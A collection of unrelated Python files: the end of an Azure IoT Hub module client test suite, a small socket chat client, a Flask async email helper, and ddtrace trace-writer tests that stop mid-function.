class TestIoTHubModuleClientDisconnect(IoTHubModuleClientTestsConfig, SharedClientDisconnectTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - EVENT: Disconnect")
class TestIoTHubModuleClientDisconnectEvent(
IoTHubModuleClientTestsConfig, SharedClientDisconnectEventTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .send_message()")
class TestIoTHubModuleClientSendD2CMessage(
IoTHubModuleClientTestsConfig, SharedClientSendD2CMessageTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .send_message_to_output()")
class TestIoTHubModuleClientSendToOutput(IoTHubModuleClientTestsConfig, WaitsForEventCompletion):
@pytest.mark.it("Begins a 'send_output_event' pipeline operation")
def test_calls_pipeline_send_message_to_output(self, client, iothub_pipeline, message):
output_name = "some_output"
client.send_message_to_output(message, output_name)
assert iothub_pipeline.send_output_event.call_count == 1
assert iothub_pipeline.send_output_event.call_args[0][0] is message
assert message.output_name == output_name
@pytest.mark.it(
"Waits for the completion of the 'send_output_event' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, iothub_pipeline_manual_cb, message
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=iothub_pipeline_manual_cb.send_output_event
)
output_name = "some_output"
client_manual_cb.send_message_to_output(message, output_name)
@pytest.mark.it(
"Raises a client error if the `send_out_event` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
iothub_pipeline_manual_cb,
message,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=iothub_pipeline_manual_cb.send_output_event,
kwargs={"error": my_pipeline_error},
)
output_name = "some_output"
with pytest.raises(client_error) as e_info:
client_manual_cb.send_message_to_output(message, output_name)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it(
"Wraps 'message' input parameter in Message object if it is not a Message object"
)
@pytest.mark.parametrize(
"message_input",
[
pytest.param("message", id="String input"),
pytest.param(222, id="Integer input"),
pytest.param(object(), id="Object input"),
pytest.param(None, id="None input"),
pytest.param([1, "str"], id="List input"),
pytest.param({"a": 2}, id="Dictionary input"),
],
)
def test_send_message_to_output_calls_pipeline_wraps_data_in_message(
self, client, iothub_pipeline, message_input
):
output_name = "some_output"
client.send_message_to_output(message_input, output_name)
assert iothub_pipeline.send_output_event.call_count == 1
sent_message = iothub_pipeline.send_output_event.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == message_input
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .receive_message_on_input()")
class TestIoTHubModuleClientReceiveInputMessage(IoTHubModuleClientTestsConfig):
@pytest.mark.it("Implicitly enables input messaging feature if not already enabled")
def test_enables_input_messaging_only_if_not_already_enabled(
self, mocker, client, iothub_pipeline
):
mocker.patch.object(
SyncClientInbox, "get"
        )  # patch this so receive_message_on_input won't block
input_name = "some_input"
# Verify Input Messaging enabled if not enabled
iothub_pipeline.feature_enabled.__getitem__.return_value = (
False
) # Input Messages will appear disabled
client.receive_message_on_input(input_name)
assert iothub_pipeline.enable_feature.call_count == 1
assert iothub_pipeline.enable_feature.call_args[0][0] == constant.INPUT_MSG
iothub_pipeline.enable_feature.reset_mock()
# Verify Input Messaging not enabled if already enabled
iothub_pipeline.feature_enabled.__getitem__.return_value = (
True
) # Input Messages will appear enabled
client.receive_message_on_input(input_name)
assert iothub_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Returns a message from the input inbox, if available")
def test_returns_message_from_input_inbox(self, mocker, client, message):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = message
manager_get_inbox_mock = mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
input_name = "some_input"
received_message = client.receive_message_on_input(input_name)
assert manager_get_inbox_mock.call_count == 1
assert manager_get_inbox_mock.call_args == mocker.call(input_name)
assert inbox_mock.get.call_count == 1
assert received_message is message
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_can_be_called_in_mode(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
input_name = "some_input"
client.receive_message_on_input(input_name, block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
def test_default_mode(self, mocker, client):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
input_name = "some_input"
client.receive_message_on_input(input_name)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a message is available, in blocking mode")
def test_no_message_in_inbox_blocking_mode(self, client, message):
input_name = "some_input"
input_inbox = client._inbox_manager.get_input_message_inbox(input_name)
assert input_inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
input_inbox._put(message)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_message = client.receive_message_on_input(input_name, block=True)
assert received_message is message
# This proves that the blocking happens because 'received_message' can't be
# 'message' until after a 10 millisecond delay on the insert. But because the
# 'received_message' IS 'message', it means that client.receive_message_on_input
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
def test_times_out_waiting_for_message_blocking_mode(self, client):
input_name = "some_input"
result = client.receive_message_on_input(input_name, block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no messages, in nonblocking mode")
def test_no_message_in_inbox_nonblocking_mode(self, client):
input_name = "some_input"
result = client.receive_message_on_input(input_name, block=False)
assert result is None
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .receive_method_request()")
class TestIoTHubModuleClientReceiveMethodRequest(
IoTHubModuleClientTestsConfig, SharedClientReceiveMethodRequestTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .send_method_response()")
class TestIoTHubModuleClientSendMethodResponse(
IoTHubModuleClientTestsConfig, SharedClientSendMethodResponseTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .get_twin()")
class TestIoTHubModuleClientGetTwin(IoTHubModuleClientTestsConfig, SharedClientGetTwinTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .patch_twin_reported_properties()")
class TestIoTHubModuleClientPatchTwinReportedProperties(
IoTHubModuleClientTestsConfig, SharedClientPatchTwinReportedPropertiesTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .receive_twin_desired_properties_patch()")
class TestIoTHubModuleClientReceiveTwinDesiredPropertiesPatch(
IoTHubModuleClientTestsConfig, SharedClientReceiveTwinDesiredPropertiesPatchTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .invoke_method()")
class TestIoTHubModuleClientInvokeMethod(WaitsForEventCompletion, IoTHubModuleClientTestsConfig):
@pytest.mark.it("Begins a 'invoke_method' HTTPPipeline operation where the target is a device")
def test_calls_pipeline_invoke_method_for_device(self, client, http_pipeline):
method_params = "__fake_method_params__"
device_id = "__fake_device_id__"
client.invoke_method(method_params, device_id)
assert http_pipeline.invoke_method.call_count == 1
assert http_pipeline.invoke_method.call_args[0][0] is device_id
assert http_pipeline.invoke_method.call_args[0][1] is method_params
@pytest.mark.it("Begins a 'invoke_method' HTTPPipeline operation where the target is a module")
def test_calls_pipeline_invoke_method_for_module(self, client, http_pipeline):
method_params = "__fake_method_params__"
device_id = "__fake_device_id__"
module_id = "__fake_module_id__"
client.invoke_method(method_params, device_id, module_id=module_id)
assert http_pipeline.invoke_method.call_count == 1
assert http_pipeline.invoke_method.call_args[0][0] is device_id
assert http_pipeline.invoke_method.call_args[0][1] is method_params
assert http_pipeline.invoke_method.call_args[1]["module_id"] is module_id
@pytest.mark.it(
"Waits for the completion of the 'invoke_method' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, http_pipeline_manual_cb
):
method_params = "__fake_method_params__"
device_id = "__fake_device_id__"
module_id = "__fake_module_id__"
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.invoke_method,
kwargs={"invoke_method_response": "__fake_invoke_method_response__"},
)
client_manual_cb.invoke_method(method_params, device_id, module_id=module_id)
@pytest.mark.it(
"Raises a client error if the `invoke_method` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, http_pipeline_manual_cb, pipeline_error, client_error
):
method_params = "__fake_method_params__"
device_id = "__fake_device_id__"
module_id = "__fake_module_id__"
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.invoke_method,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.invoke_method(method_params, device_id, module_id=module_id)
assert e_info.value.__cause__ is my_pipeline_error
####################
# HELPER FUNCTIONS #
####################
def merge_dicts(d1, d2):
d3 = d1.copy()
d3.update(d2)
return d3
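
# Hypothetical sanity check, added for illustration (not part of the original suite):
# merge_dicts gives the second dict priority on key collisions, which is what the
# hybrid-environment tests above rely on.
def test_merge_dicts_second_dict_wins():
    assert merge_dicts({"A": 1}, {"A": 2, "B": 3}) == {"A": 2, "B": 3}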
|
client.py
|
import socket
import threading
from time import sleep
import datetime as dt
HOST = '127.0.0.1' # Use Server IP
PORT = 8000 # Use Server Port
HEADERLEN = 10
name = input("Enter nickname: ")
print(f'Connecting to {HOST}:{PORT}...\n')
# Connecting To Server
def connect():
    skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    skt.connect((HOST, PORT))
    return skt  # hand the connected socket back so the worker threads can share it
def getMsg(skt):
    # Read the fixed-size length header first, then exactly that many payload bytes
    header = b''
    while len(header) < HEADERLEN:
        chunk = skt.recv(HEADERLEN - len(header))
        if not chunk:
            return ''  # connection closed before a full header arrived
        header += chunk
    msglen = int(header)
    payload = b''
    while len(payload) < msglen:
        chunk = skt.recv(msglen - len(payload))
        if not chunk:
            break
        payload += chunk
    return payload.decode()  # returns DECODED message
def sendMsg(clnt, msg):
msg = f'{len(msg):<{HEADERLEN}}' + msg
msg = msg.encode()
clnt.send(msg) # sends ENCODED message
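# Illustration of the framing used above (assuming HEADERLEN stays at 10):
# sendMsg(clnt, "hi") first sends a 10-byte header -- the digit '2' left-justified and
# padded with spaces -- followed by the payload b'hi', which is what getMsg parses back out.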
def receive():
    while True:
        try:
            msg = getMsg(clnt)
            if not msg:
                print("\nConnection closed by server.")
                break
            if msg == 'name':
                sendMsg(clnt, name)
            else:
                x = dt.datetime.now()
                time = x.strftime("%H:%M:%S")
                date = x.strftime("%d/%m/%Y")  # Soon
                print(f"{time} >> {msg}")
        except Exception:
            print("\nError, Possible Server Down.")
            sleep(2)
def write():
while True:
msg = '{}: {}'.format(name, input())
sendMsg(clnt, msg)
clnt = connect()  # connect before starting the worker threads

recv_thread = threading.Thread(target=receive)
recv_thread.start()

write_thread = threading.Thread(target=write)
write_thread.start()
|
email.py
|
"""
-------------------------------------------------
Project Name: LearnFlask
File Name: email
Author: cjiang
Date: 2020/5/21 6:59 PM
-------------------------------------------------
"""
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_mail(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX']+subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
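
# Hypothetical usage sketch (the recipient, template name and kwargs below are illustrative
# and not defined in this file):
#   send_mail(user.email, 'Confirm Your Account', 'auth/email/confirm', user=user, token=token)
# send_mail returns the Thread, so callers (e.g. tests) can join() it to wait for delivery.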
|
test_writer.py
|
import os
import socket
import tempfile
import threading
import time
import mock
import msgpack
import pytest
from six.moves import BaseHTTPServer
from six.moves import socketserver
from ddtrace.constants import KEEP_SPANS_RATE_KEY
from ddtrace.internal.compat import PY3
from ddtrace.internal.compat import get_connection_response
from ddtrace.internal.compat import httplib
from ddtrace.internal.encoding import MSGPACK_ENCODERS
from ddtrace.internal.uds import UDSHTTPConnection
from ddtrace.internal.writer import AgentWriter
from ddtrace.internal.writer import LogWriter
from ddtrace.internal.writer import Response
from ddtrace.internal.writer import _human_size
from ddtrace.span import Span
from tests.utils import AnyInt
from tests.utils import BaseTestCase
from tests.utils import override_env
class DummyOutput:
def __init__(self):
self.entries = []
def write(self, message):
self.entries.append(message)
def flush(self):
pass
class AgentWriterTests(BaseTestCase):
N_TRACES = 11
def test_metrics_disabled(self):
statsd = mock.Mock()
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=False)
for i in range(10):
writer.write([Span(name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)])
writer.stop()
writer.join()
statsd.increment.assert_not_called()
statsd.distribution.assert_not_called()
def test_metrics_bad_endpoint(self):
statsd = mock.Mock()
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=True)
for i in range(10):
writer.write([Span(name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)])
writer.stop()
writer.join()
statsd.distribution.assert_has_calls(
[
mock.call("datadog.tracer.buffer.accepted.traces", 10, tags=[]),
mock.call("datadog.tracer.buffer.accepted.spans", 50, tags=[]),
mock.call("datadog.tracer.http.requests", writer.RETRY_ATTEMPTS, tags=[]),
mock.call("datadog.tracer.http.errors", 1, tags=["type:err"]),
mock.call("datadog.tracer.http.dropped.bytes", AnyInt(), tags=[]),
],
any_order=True,
)
def test_metrics_trace_too_big(self):
statsd = mock.Mock()
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=True)
for i in range(10):
writer.write([Span(name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)])
writer.write([Span(name="a" * 5000, trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(2 ** 10)])
writer.stop()
writer.join()
statsd.distribution.assert_has_calls(
[
mock.call("datadog.tracer.buffer.accepted.traces", 10, tags=[]),
mock.call("datadog.tracer.buffer.accepted.spans", 50, tags=[]),
mock.call("datadog.tracer.buffer.dropped.traces", 1, tags=["reason:t_too_big"]),
mock.call("datadog.tracer.buffer.dropped.bytes", AnyInt(), tags=["reason:t_too_big"]),
mock.call("datadog.tracer.http.requests", writer.RETRY_ATTEMPTS, tags=[]),
mock.call("datadog.tracer.http.errors", 1, tags=["type:err"]),
mock.call("datadog.tracer.http.dropped.bytes", AnyInt(), tags=[]),
],
any_order=True,
)
def test_metrics_multi(self):
statsd = mock.Mock()
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=True)
for i in range(10):
writer.write([Span(name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)])
writer.flush_queue()
statsd.distribution.assert_has_calls(
[
mock.call("datadog.tracer.buffer.accepted.traces", 10, tags=[]),
mock.call("datadog.tracer.buffer.accepted.spans", 50, tags=[]),
mock.call("datadog.tracer.http.requests", writer.RETRY_ATTEMPTS, tags=[]),
mock.call("datadog.tracer.http.errors", 1, tags=["type:err"]),
mock.call("datadog.tracer.http.dropped.bytes", AnyInt(), tags=[]),
],
any_order=True,
)
statsd.reset_mock()
for i in range(10):
writer.write([Span(name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)])
writer.stop()
writer.join()
statsd.distribution.assert_has_calls(
[
mock.call("datadog.tracer.buffer.accepted.traces", 10, tags=[]),
mock.call("datadog.tracer.buffer.accepted.spans", 50, tags=[]),
mock.call("datadog.tracer.http.requests", writer.RETRY_ATTEMPTS, tags=[]),
mock.call("datadog.tracer.http.errors", 1, tags=["type:err"]),
mock.call("datadog.tracer.http.dropped.bytes", AnyInt(), tags=[]),
],
any_order=True,
)
def test_write_sync(self):
statsd = mock.Mock()
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=True, sync_mode=True)
writer.write([Span(name="name", trace_id=1, span_id=j, parent_id=j - 1 or None) for j in range(5)])
statsd.distribution.assert_has_calls(
[
mock.call("datadog.tracer.buffer.accepted.traces", 1, tags=[]),
mock.call("datadog.tracer.buffer.accepted.spans", 5, tags=[]),
mock.call("datadog.tracer.http.requests", writer.RETRY_ATTEMPTS, tags=[]),
mock.call("datadog.tracer.http.errors", 1, tags=["type:err"]),
mock.call("datadog.tracer.http.dropped.bytes", AnyInt(), tags=[]),
],
any_order=True,
)
def test_drop_reason_bad_endpoint(self):
statsd = mock.Mock()
writer_metrics_reset = mock.Mock()
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=False)
writer._metrics_reset = writer_metrics_reset
for i in range(10):
writer.write([Span(name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)])
writer.stop()
writer.join()
writer_metrics_reset.assert_called_once()
assert 1 == writer._metrics["http.errors"]["count"]
assert 10 == writer._metrics["http.dropped.traces"]["count"]
def test_drop_reason_trace_too_big(self):
statsd = mock.Mock()
writer_metrics_reset = mock.Mock()
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=False)
writer._metrics_reset = writer_metrics_reset
for i in range(10):
writer.write([Span(name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)])
writer.write([Span(name="a" * 5000, trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(2 ** 10)])
writer.stop()
writer.join()
writer_metrics_reset.assert_called_once()
assert 1 == writer._metrics["buffer.dropped.traces"]["count"]
assert ["reason:t_too_big"] == writer._metrics["buffer.dropped.traces"]["tags"]
def test_drop_reason_buffer_full(self):
statsd = mock.Mock()
writer_metrics_reset = mock.Mock()
writer = AgentWriter(agent_url="http://asdf:1234", buffer_size=5300, dogstatsd=statsd, report_metrics=False)
writer._metrics_reset = writer_metrics_reset
for i in range(10):
writer.write([Span(name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)])
writer.write([Span(name="a", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)])
writer.stop()
writer.join()
writer_metrics_reset.assert_called_once()
assert 1 == writer._metrics["buffer.dropped.traces"]["count"]
assert ["reason:full"] == writer._metrics["buffer.dropped.traces"]["tags"]
def test_drop_reason_encoding_error(self):
n_traces = 10
statsd = mock.Mock()
writer_encoder = mock.Mock()
writer_encoder.__len__ = (lambda *args: n_traces).__get__(writer_encoder)
writer_metrics_reset = mock.Mock()
writer_encoder.encode.side_effect = Exception
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=False)
writer._encoder = writer_encoder
writer._metrics_reset = writer_metrics_reset
for i in range(n_traces):
writer.write([Span(name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)])
writer.stop()
writer.join()
writer_metrics_reset.assert_called_once()
assert 10 == writer._metrics["encoder.dropped.traces"]["count"]
def test_keep_rate(self):
statsd = mock.Mock()
writer_run_periodic = mock.Mock()
writer_put = mock.Mock()
writer_put.return_value = Response(status=200)
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=False)
writer.run_periodic = writer_run_periodic
writer._put = writer_put
traces = [
[Span(name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)] for i in range(4)
]
traces_too_big = [
[Span(name="a" * 5000, trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(2 ** 10)]
for i in range(4)
]
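# Context for the assertions below: _drop_sma (a simple moving average of the drop
# rate) tracks the historical fraction of dropped traces, and each trace in a
# flushed payload is tagged under KEEP_SPANS_RATE_KEY with the keep rate observed
# before the current flush (hence the "(refers to the past)" notes in the steps below).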
# 1. We write 4 traces successfully.
for trace in traces:
writer.write(trace)
writer.flush_queue()
payload = msgpack.unpackb(writer_put.call_args.args[0])
# No previous drops.
assert 0.0 == writer._drop_sma.get()
# 4 traces written.
assert 4 == len(payload)
# 100% of traces kept (refers to the past).
# No traces sent before now so 100% kept.
for trace in payload:
assert 1.0 == trace[0]["metrics"].get(KEEP_SPANS_RATE_KEY, -1)
# 2. We fail to write 4 traces because of size limitation.
for trace in traces_too_big:
writer.write(trace)
writer.flush_queue()
# 50% of traces were dropped historically.
# 4 successfully written before and 4 dropped now.
assert 0.5 == writer._drop_sma.get()
# put not called since no new traces are available.
writer_put.assert_called_once()
# 3. We write 2 traces successfully.
for trace in traces[:2]:
writer.write(trace)
writer.flush_queue()
payload = msgpack.unpackb(writer_put.call_args.args[0])
# 40% of traces were dropped historically (4 dropped out of the 10 traces submitted so far).
assert 0.4 == writer._drop_sma.get()
# 2 traces written.
assert 2 == len(payload)
# 50% of traces kept (refers to the past).
# We had 4 successfully written and 4 dropped.
for trace in payload:
assert 0.5 == trace[0]["metrics"].get(KEEP_SPANS_RATE_KEY, -1)
# 4. We write 1 trace successfully and fail to write 3.
writer.write(traces[0])
for trace in traces_too_big[:3]:
writer.write(trace)
writer.flush_queue()
payload = msgpack.unpackb(writer_put.call_args.args[0])
# 50% of traces were dropped historically (7 dropped out of the 14 traces submitted so far).
assert 0.5 == writer._drop_sma.get()
# 1 trace written.
assert 1 == len(payload)
# 60% of traces kept (refers to the past).
# We had 4 successfully written, then 4 dropped, then 2 written.
for trace in payload:
assert 0.6 == trace[0]["metrics"].get(KEEP_SPANS_RATE_KEY, -1)
class LogWriterTests(BaseTestCase):
N_TRACES = 11
def create_writer(self):
self.output = DummyOutput()
writer = LogWriter(out=self.output)
for i in range(self.N_TRACES):
writer.write([Span(name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(7)])
return writer
def test_log_writer(self):
self.create_writer()
self.assertEqual(len(self.output.entries), self.N_TRACES)
def test_humansize():
assert _human_size(0) == "0B"
assert _human_size(999) == "999B"
assert _human_size(1000) == "1KB"
assert _human_size(10000) == "10KB"
assert _human_size(100000) == "100KB"
assert _human_size(1000000) == "1MB"
assert _human_size(10000000) == "10MB"
assert _human_size(1000000000) == "1GB"
class _BaseHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
error_message_format = "%(message)s\n"
error_content_type = "text/plain"
@staticmethod
def log_message(format, *args): # noqa: A002
pass
class _APIEndpointRequestHandlerTest(_BaseHTTPRequestHandler):
expected_path_prefix = None
def do_PUT(self):
if self.expected_path_prefix is not None:
assert self.path.startswith(self.expected_path_prefix)
self.send_error(200, "OK")
class _TimeoutAPIEndpointRequestHandlerTest(_BaseHTTPRequestHandler):
def do_PUT(self):
# This server sleeps longer than our timeout
time.sleep(5)
class _ResetAPIEndpointRequestHandlerTest(_BaseHTTPRequestHandler):
def do_PUT(self):
return
_HOST = "0.0.0.0"
_PORT = 8743
_TIMEOUT_PORT = _PORT + 1
_RESET_PORT = _TIMEOUT_PORT + 1
class UDSHTTPServer(socketserver.UnixStreamServer, BaseHTTPServer.HTTPServer):
def server_bind(self):
BaseHTTPServer.HTTPServer.server_bind(self)
def _make_uds_server(path, request_handler):
server = UDSHTTPServer(path, request_handler)
t = threading.Thread(target=server.serve_forever)
# Set daemon just in case something fails
t.daemon = True
t.start()
# Wait for the server to start
resp = None
while resp != 200:
conn = UDSHTTPConnection(server.server_address, _HOST, 2019)
try:
conn.request("PUT", "/")
resp = get_connection_response(conn).status
finally:
conn.close()
time.sleep(0.01)
return server, t
@pytest.fixture
def endpoint_uds_server():
socket_name = tempfile.mktemp()
handler = _APIEndpointRequestHandlerTest
server, thread = _make_uds_server(socket_name, handler)
handler.expected_path_prefix = "/v0."
try:
yield server
finally:
handler.expected_path_prefix = None
server.shutdown()
thread.join()
os.unlink(socket_name)
def _make_server(port, request_handler):
server = BaseHTTPServer.HTTPServer((_HOST, port), request_handler)
t = threading.Thread(target=server.serve_forever)
# Set daemon just in case something fails
t.daemon = True
t.start()
return server, t
@pytest.fixture(scope="module")
def endpoint_test_timeout_server():
server, thread = _make_server(_TIMEOUT_PORT, _TimeoutAPIEndpointRequestHandlerTest)
try:
yield thread
finally:
server.shutdown()
thread.join()
@pytest.fixture(scope="module")
def endpoint_test_reset_server():
server, thread = _make_server(_RESET_PORT, _ResetAPIEndpointRequestHandlerTest)
try:
yield thread
finally:
server.shutdown()
thread.join()
@pytest.fixture
def endpoint_assert_path():
handler = _APIEndpointRequestHandlerTest
server, thread = _make_server(_PORT, handler)
def configure(expected_path_prefix=None):
handler.expected_path_prefix = expected_path_prefix
return thread
try:
yield configure
finally:
handler.expected_path_prefix = None
server.shutdown()
thread.join()
def test_agent_url_path(endpoint_assert_path):
# test without base path
endpoint_assert_path("/v0.")
writer = AgentWriter(agent_url="http://%s:%s/" % (_HOST, _PORT))
writer._encoder.put([Span("foobar")])
writer.flush_queue(raise_exc=True)
# test without base path and without a trailing slash
writer = AgentWriter(agent_url="http://%s:%s" % (_HOST, _PORT))
writer._encoder.put([Span("foobar")])
writer.flush_queue(raise_exc=True)
# test with a base path
endpoint_assert_path("/test/v0.")
writer = AgentWriter(agent_url="http://%s:%s/test/" % (_HOST, _PORT))
writer._encoder.put([Span("foobar")])
writer.flush_queue(raise_exc=True)
def test_flush_connection_timeout_connect():
writer = AgentWriter(agent_url="http://%s:%s" % (_HOST, 2019))
if PY3:
exc_type = OSError
else:
exc_type = socket.error
with pytest.raises(exc_type):
writer._encoder.put([Span("foobar")])
writer.flush_queue(raise_exc=True)
def test_flush_connection_timeout(endpoint_test_timeout_server):
writer = AgentWriter(agent_url="http://%s:%s" % (_HOST, _TIMEOUT_PORT))
with pytest.raises(socket.timeout):
writer._encoder.put([Span("foobar")])
writer.flush_queue(raise_exc=True)
def test_flush_connection_reset(endpoint_test_reset_server):
writer = AgentWriter(agent_url="http://%s:%s" % (_HOST, _RESET_PORT))
if PY3:
exc_types = (httplib.BadStatusLine, ConnectionResetError)
else:
exc_types = (httplib.BadStatusLine,)
with pytest.raises(exc_types):
writer._encoder.put([Span("foobar")])
writer.flush_queue(raise_exc=True)
def test_flush_connection_uds(endpoint_uds_server):
writer = AgentWriter(agent_url="unix://%s" % endpoint_uds_server.server_address)
writer._encoder.put([Span("foobar")])
writer.flush_queue(raise_exc=True)
def test_flush_queue_raise():
writer = AgentWriter(agent_url="http://dne:1234")
# Should not raise
writer.write([])
writer.flush_queue(raise_exc=False)
error = OSError if PY3 else IOError
with pytest.raises(error):
writer.write([])
writer.flush_queue(raise_exc=True)
def test_racing_start():
writer = AgentWriter(agent_url="http://dne:1234")
def do_write(i):
writer.write([Span(str(i))])
ts = [threading.Thread(target=do_write, args=(i,)) for i in range(100)]
for t in ts:
t.start()
for t in ts:
t.join()
assert len(writer._encoder) == 100
def test_additional_headers():
with override_env(dict(_DD_TRACE_WRITER_ADDITIONAL_HEADERS="additional-header:additional-value,header2:value2")):
writer = AgentWriter(agent_url="http://localhost:9126")
assert writer._headers["additional-header"] == "additional-value"
assert writer._headers["header2"] == "value2"
def test_bad_encoding(monkeypatch):
monkeypatch.setenv("DD_TRACE_API_VERSION", "foo")
with pytest.raises(ValueError):
AgentWriter(agent_url="http://localhost:9126")
@pytest.mark.parametrize(
"init_api_version,api_version,endpoint,encoder_cls",
[
(None, "v0.3", "v0.3/traces", MSGPACK_ENCODERS["v0.3"]),
("v0.3", "v0.3", "v0.3/traces", MSGPACK_ENCODERS["v0.3"]),
("v0.4", "v0.4", "v0.4/traces", MSGPACK_ENCODERS["v0.4"]),
("v0.5", "v0.5", "v0.5/traces", MSGPACK_ENCODERS["v0.5"]),
],
)
def test_writer_recreate_api_version(init_api_version, api_version, endpoint, encoder_cls):
writer = AgentWriter(agent_url="http://dne:1234", api_version=init_api_version)
assert writer._api_version == api_version
assert writer._endpoint == endpoint
assert isinstance(writer._encoder, encoder_cls)
writer = writer.recreate()
assert writer._api_version == api_version
assert writer._endpoint == endpoint
assert isinstance(writer._encoder, encoder_cls)
def test_writer_reuse_connections_envvar(monkeypatch):
monkeypatch.setenv("DD_TRACE_WRITER_REUSE_CONNECTIONS", "false")
writer = AgentWriter(agent_url="http://localhost:9126")
assert not writer._reuse_connections
monkeypatch.setenv("DD_TRACE_WRITER_REUSE_CONNECTIONS", "true")
writer = AgentWriter(agent_url="http://localhost:9126")
assert writer._reuse_connections
def test_writer_reuse_connections():
# Ensure connection is not reused
writer = AgentWriter(agent_url="http://localhost:9126", reuse_connections=True)
